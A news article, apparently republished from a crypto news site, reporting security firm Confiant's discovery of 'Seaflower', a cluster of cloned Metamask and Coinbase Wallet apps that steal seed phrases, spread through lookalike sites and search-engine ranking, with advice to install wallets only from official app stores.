Confiant, an advertising security agency, has discovered a group of malicious activities related to distributed wallet applications that allow hackers to steal private seeds and obtain user funds through hidden impostor wallets. Applications are distributed by cloning legitimate sites, giving the impression that the user is downloading the original application.
Malicious cluster targets Web3-enabled wallets such as Metamask
Hackers are becoming more and more inventive, designing attacks to take advantage of cryptocurrency users. Confiant, a company that studies the quality of advertising and the security risks it can pose to Internet users, warned about a new type of attack affecting users of popular Web3 wallets such as Metamask and Coinbase Wallet.
The cluster, which was identified as “Seaflower”, was qualified by Confian as one of the most sophisticated attacks of its kind. The report states that regular users cannot detect these applications because they are almost identical to the original applications, but have a different codebase that allows hackers to steal wallet seed phrases, giving them access to funds.
Distribution and recommendations
The report found that these apps are distributed mostly outside of regular app stores through links found by users on search engines such as Baidu. The researchers argue that the cluster must be of Chinese origin due to the languages in which the code comments are written and other elements such as the location of the infrastructure and the services used.
The links of these apps reach high spots on search engines thanks to intelligent SEO processing, which allows them to rank high and trick users into believing they are accessing a real site. The sophistication of these applications comes down to how the code is hidden, obfuscating much of how this system works.
The backdoor application sends the original phrases to the remote location at the same time as it is created, and this is the main attack vector for the Metamask impostor. For other wallets, Seaflower also uses a very similar attack vector.
The experts also made a number of recommendations for securing wallets on devices. These backdoored apps are only distributed outside of app stores, so Confiant advises users to always try to install these apps from official stores on Android and iOS.
What do you think about Metamask and Web3 backdoor wallets? Tell us in the comments section below.
Denial of responsibilityA: This article is for informational purposes only. This is not a direct offer or solicitation to buy or sell, nor is it a recommendation or endorsement of any products, services or companies. Bitcoin.com does not provide investment, tax, legal or accounting advice. Neither the company nor the author is directly or indirectly liable for any damage or loss caused or alleged to be caused by the use of or reliance on any content, goods or services mentioned in this article.
Credit : news.bitcoin.com